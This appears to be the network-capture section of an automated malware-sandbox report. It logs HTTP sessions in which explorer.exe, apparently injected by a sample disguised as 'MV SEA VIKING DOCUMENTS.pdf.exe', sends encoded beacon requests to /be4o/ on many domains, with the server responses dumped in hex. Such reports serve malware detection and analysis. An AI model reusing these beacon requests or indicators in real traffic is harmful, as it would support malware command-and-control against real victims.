                                                                                                                                                                                                                              Host: www.rsxrsh.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:52:29.171334982 CET8995INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: nginx/1.20.1
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:29 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=gbk
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                              Location: /404.html
                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              13192.168.11.204979234.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.180299044 CET8996OUTGET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.noireimpactcollective.net
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.286969900 CET8996INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:34 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              14192.168.11.204979335.214.4.7080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:52:44.394613981 CET8997OUTGET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:52:44.419480085 CET8998INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:52:44 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              15192.168.11.204979535.244.144.19980C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:53:08.784050941 CET9005OUTGET /be4o/?h48Hl=iu9SHmJYjlqHSITYxUYF5zd8ZPof8OreVpr1w+DDUlIuWCBWIgIZulFzL5qHxGUDcYYs&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.4huav946.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:53:09.078499079 CET9007INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx/1.14.0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:53:08 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 5379
                                                                                                                                                                                                                              Last-Modified: Fri, 30 Apr 2021 06:44:28 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              ETag: "608ba74c-1503"
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 32 35 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c
                                                                                                                                                                                                                              Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.25.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,
                                                                                                                                                                                                                              Feb 21, 2022 16:53:09.078566074 CET9008INData Raw: 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74
                                                                                                                                                                                                                              Data Ascii: e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n){(new Image).src=n}function reportLoading(n){n=n|
                                                                                                                                                                                                                              Feb 21, 2022 16:53:09.078614950 CET9010INData Raw: 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 73 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 2f 2f 74 72 61 63 6b 2e 75 63 2e 63 6e 2f 63 6f 6c 6c 65 63 74 22 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 22 29 2e 63 6f 6e 63
                                                                                                                                                                                                                              Data Ascii: lace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||a())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android"
                                                                                                                                                                                                                              Feb 21, 2022 16:53:09.078649044 CET9010INData Raw: 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 65 3d 71 73 4c 69 73 74 5b 69 5d
                                                                                                                                                                                                                              Data Ascii: rch||"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=t


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              16192.168.11.204979634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:53:14.091465950 CET9010OUTGET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:53:14.197622061 CET9011INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:53:14 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              17192.168.11.2049798162.0.209.2180C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:53:24.591715097 CET9018OUTGET /be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.itservon.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:53:24.751013041 CET9019INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                              content-length: 707
                                                                                                                                                                                                                              date: Mon, 21 Feb 2022 15:53:24 GMT
                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                              location: https://www.itservon.com/be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmL
                                                                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              18192.168.11.204979934.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:53:29.954879999 CET9020OUTGET /be4o/?h48Hl=i0+Fnnt4E2duUPt43OZuwY3vuaej64lfKZi0K7F4B5AoqOaU2cNQP6t/zkb03XoiZyP6&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.fairytalepageants.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:53:30.061605930 CET9021INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:53:30 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              19192.168.11.204980066.29.154.15780C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:53:35.418968916 CET9022OUTGET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.buresdx.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:53:35.679471016 CET9022INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:53:35 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                              Content-Length: 277
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              2192.168.11.2049807142.250.185.174443C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
